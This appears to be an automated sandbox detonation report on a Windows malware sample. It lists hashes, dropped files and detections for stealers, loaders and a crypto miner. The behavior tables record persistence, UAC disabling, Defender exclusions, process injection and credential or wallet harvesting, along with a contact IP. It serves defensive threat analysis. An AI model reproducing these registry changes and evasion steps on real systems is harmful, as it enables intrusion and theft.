| SHA1 | a5ec81941e7f3194964505759f3988521c66568c |
| SHA256 | 659f716d08a416f1091664f7264caf55652a7ca86abf9d53295a98b0f72f54e0 |
| SHA512 | 2933f667861e17667e122481598dff52054afb3da85e0557666d6b60388e8f3de025a64e3cd740031c1656c76a1832f89d9139fcfac246c6064b28779cd2a207 |
\ProgramData\mozglue.dll
| MD5 | 808187ecda753649e06cc1b8eb3f08ff |
| SHA1 | b4928c1082a7c2bf994640112cd1a1775ed53f09 |
| SHA256 | c734c3b473d9e34f830a694ffed13612c256450a2a4bb7497dd9c7cc96fb7fb3 |
| SHA512 | 9a9d7bf955a441fe5bb779403e0e1f144215aa620c8b50f3dd48e350f8718bfb62144a39827b31333db9ab4fcccbc74b3f9aaf4a430cf781fd3f1bf86c530be0 |
memory/1576-597-0x00000000007C0000-0x00000000007E0000-memory.dmp
memory/1552-596-0x0000000000400000-0x00000000005AA000-memory.dmp
memory/1576-598-0x0000000000BD0000-0x0000000000BF0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\4D55.bat
| MD5 | 55cc761bf3429324e5a0095cab002113 |
| SHA1 | 2cc1ef4542a4e92d4158ab3978425d517fafd16d |
| SHA256 | d6cceb3c71b80403364bf142f2fa4624ee0be36a49bac25ed45a497cf1ce9c3a |
| SHA512 | 33f9f5cad22d291077787c7df510806e4ac31f453d288712595af6debe579fabed6cdf4662e46e6fa94de135b161e739f55cfae05c36c87af85ed6a6ad1c9155 |
memory/1316-628-0x00000000007E0000-0x00000000008E0000-memory.dmp
\Users\Admin\AppData\Local\Temp\DHCFIDAKJD.exe
| MD5 | 634689da3c5d52294c61ed157dad45ef |
| SHA1 | 5f2d059addbcfffc07a51fee3c320395251b927c |
| SHA256 | bb61bda60bdf02c3d432ff5ce7d46bfbcd8a203fd19cc21670422b02a708930c |
| SHA512 | a06eb7027c96318cf1cafee13ee770cae45281962a7252383203f79505318ebf6dda06f0eea4a7df5bd8824175992c3a12a7ec8ecbccdde941c082c26aaceda8 |
C:\Users\Admin\AppData\Local\Temp\8C78.exe
| MD5 | ae597691370226cc4354b9897415b115 |
| SHA1 | 3e89b4b1d81cdae205ac96f151bf3dc0fe3337ae |
| SHA256 | 10f5ba78f4d86b82127e167fee1ea0e6b26dd087ecfe933bda24e5d2685ad675 |
| SHA512 | f2db423695272ea3519d6329965baf4f0eee6dda62820406ecafcc13385380cb6279c097a8a610163835a181f845ccac7982c7f867b90abc5b553968b3ac7f24 |
C:\Users\Admin\AppData\Local\Temp\VcIJRFpHiPTKASLFH\cTmyoaxliqPIUed\RRZnTnn.exe
| MD5 | 37ee8ae952e7329a17778e42e82e4aa4 |
| SHA1 | 58361de906707372eb165a8e40c3db1c87e1258f |
| SHA256 | 2934cd388c6ecbd34ca20d76ec4a8823a904bb748551368260e5b3613f69cb5e |
| SHA512 | 48c223f151af2a5949ad66b79da28e8550b07155b002e31ac7af566ae287d06dfcf5b5baa83e9c77c850aedda96c9c18e757db4c8d31f62e744992cf1eb1b0a7 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-03-15 02:01
Reported
2024-03-15 02:03
Platform
win10v2004-20240226-en
Max time kernel
150s
Max time network
153s
Command Line
Signatures
Amadey
DcRat
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\u4WujRaZGRrpshjaTNeyFxoy.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TUo7DmsI28Drtz3mNGD5uOAu.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\oGaKBCTfWiLMwW1zKMcIP3rc.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\v9CupCzEBDEI1PrvrnKsTxy1.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QBUMczUi2Pf941DefaINrAvS.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TI15w0gLkpZoqvO6wRGoe3gP.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IKiCs9k3lloeS5vcLyYa2j1X.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\yjE7yT7UVOSceR9MaY75fPuX.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Lumma Stealer
SmokeLoader
Socks5Systemz
Stealc
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe | N/A |
Windows security bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe = "0" | C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe | N/A |
xmrig
Detect binaries embedding considerable number of MFA browser extension IDs.
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detect binaries embedding considerable number of cryptocurrency wallet browser extension IDs.
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects binaries (Windows and macOS) referencing many web browsers. Observed in information stealers.
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects executables (downlaoders) containing URLs to raw contents of a paste
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Detects executables packed with VMProtect.
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects executables packed with or use KoiVM
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
UPX dump on OEP (original entry point)
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Creates new service(s)
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\drivers\etc\hosts | C:\Users\Admin\Pictures\mqJpRwpbfK974CI6kSx5DDx3.exe | N/A |
| File created | C:\Windows\system32\drivers\etc\hosts | C:\ProgramData\Google\Chrome\updater.exe | N/A |
Stops running service(s)
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zS8CBF.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\SysWOW64\rundll32.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zS8CBF.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\syncUpd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\GDGIJECGDG.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\33945c4f34\Dctooux.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\1346.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation | C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\yjE7yT7UVOSceR9MaY75fPuX.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QBUMczUi2Pf941DefaINrAvS.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TI15w0gLkpZoqvO6wRGoe3gP.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TUo7DmsI28Drtz3mNGD5uOAu.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\oGaKBCTfWiLMwW1zKMcIP3rc.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IKiCs9k3lloeS5vcLyYa2j1X.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\v9CupCzEBDEI1PrvrnKsTxy1.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\u4WujRaZGRrpshjaTNeyFxoy.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe | N/A |
Executes dropped EXE
Loads dropped DLL
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
Reads WinSCP keys stored on the system
Reads data files stored by FTP clients
Reads local data of messenger clients
Reads user/profile data of web browsers
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Unexpected DNS network traffic destination
| Description | Indicator | Process | Target |
| Destination IP | 91.211.247.248 | N/A | N/A |
Windows security modification
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions | C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe = "0" | C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Ledger-Live Updater = "C:\\Users\\Admin\\AppData\\Local\\Temp\\GDGIJECGDG.exe" | C:\Users\Admin\AppData\Local\Temp\GDGIJECGDG.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\a0e81e80-45cc-4456-972b-e9d648d8e4bd\\1346.exe\" --AutoStart" | C:\Users\Admin\AppData\Local\Temp\1346.exe | N/A |
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe | N/A |
Drops Chrome extension
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json | C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe | N/A |
| File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json | C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe | N/A |
Drops desktop.ini file(s)
| Description | Indicator | Process | Target |
| File opened for modification | C:\$RECYCLE.BIN\S-1-5-18\desktop.ini | C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\D: | C:\Users\Admin\Pictures\UzSZFMWFpthvMvdZfvnxrxs2.exe | N/A |
| File opened (read-only) | \??\F: | C:\Users\Admin\Pictures\UzSZFMWFpthvMvdZfvnxrxs2.exe | N/A |
| File opened (read-only) | \??\D: | C:\Users\Admin\Pictures\UzSZFMWFpthvMvdZfvnxrxs2.exe | N/A |
| File opened (read-only) | \??\F: | C:\Users\Admin\Pictures\UzSZFMWFpthvMvdZfvnxrxs2.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE | C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 | C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content | C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_A2CFFC3C54D475112D9FC5039EB0095F | C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_F335A0F859C450629B87083CAA1DC971 | C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe | N/A |
| File created | C:\Windows\system32\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\7zS8CBF.tmp\Install.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\D4579ED561AFE0AD26F688A8C9A41CC6 | C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_F335A0F859C450629B87083CAA1DC971 | C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe | N/A |
| File opened for modification | C:\Windows\system32\MRT.exe | C:\Users\Admin\Pictures\mqJpRwpbfK974CI6kSx5DDx3.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_08872284D8414653D8A6B617C1164F2D | C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft | C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache | C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_08872284D8414653D8A6B617C1164F2D | C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe | N/A |
| File created | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | C:\Users\Admin\AppData\Local\Temp\VcIJRFpHiPTKASLFH\cTmyoaxliqPIUed\BZzGTBs.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 | C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 | C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\D4579ED561AFE0AD26F688A8C9A41CC6 | C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA | C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe | N/A |
| File opened for modification | C:\Windows\system32\MRT.exe | C:\ProgramData\Google\Chrome\updater.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies | C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData | C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA | C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe | N/A |
| File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\VcIJRFpHiPTKASLFH\cTmyoaxliqPIUed\BZzGTBs.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 | C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_A2CFFC3C54D475112D9FC5039EB0095F | C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 456 set thread context of 652 | N/A | C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe |
| PID 856 set thread context of 3740 | N/A | C:\ProgramData\Google\Chrome\updater.exe | C:\Windows\system32\conhost.exe |
| PID 856 set thread context of 5072 | N/A | C:\ProgramData\Google\Chrome\updater.exe | C:\Windows\explorer.exe |
| PID 2080 set thread context of 856 | N/A | C:\Users\Admin\AppData\Local\Temp\1346.exe | C:\Users\Admin\AppData\Local\Temp\1346.exe |
| PID 972 set thread context of 3940 | N/A | C:\Users\Admin\AppData\Local\Temp\313E.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 3320 set thread context of 3216 | N/A | C:\Users\Admin\AppData\Local\Temp\1346.exe | C:\Users\Admin\AppData\Local\Temp\1346.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi | C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe | N/A |
| File created | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe | N/A |
| File created | C:\Program Files (x86)\FgzgbZZAFicU2\NSJEWZYheTYvn.dll | C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe | N/A |
| File created | C:\Program Files (x86)\qeprHDpCnlqFkbDgwPR\PIalxcO.xml | C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe | N/A |
| File created | C:\Program Files (x86)\PnlHXrUXYeUn\haoQxrd.dll | C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja | C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe | N/A |
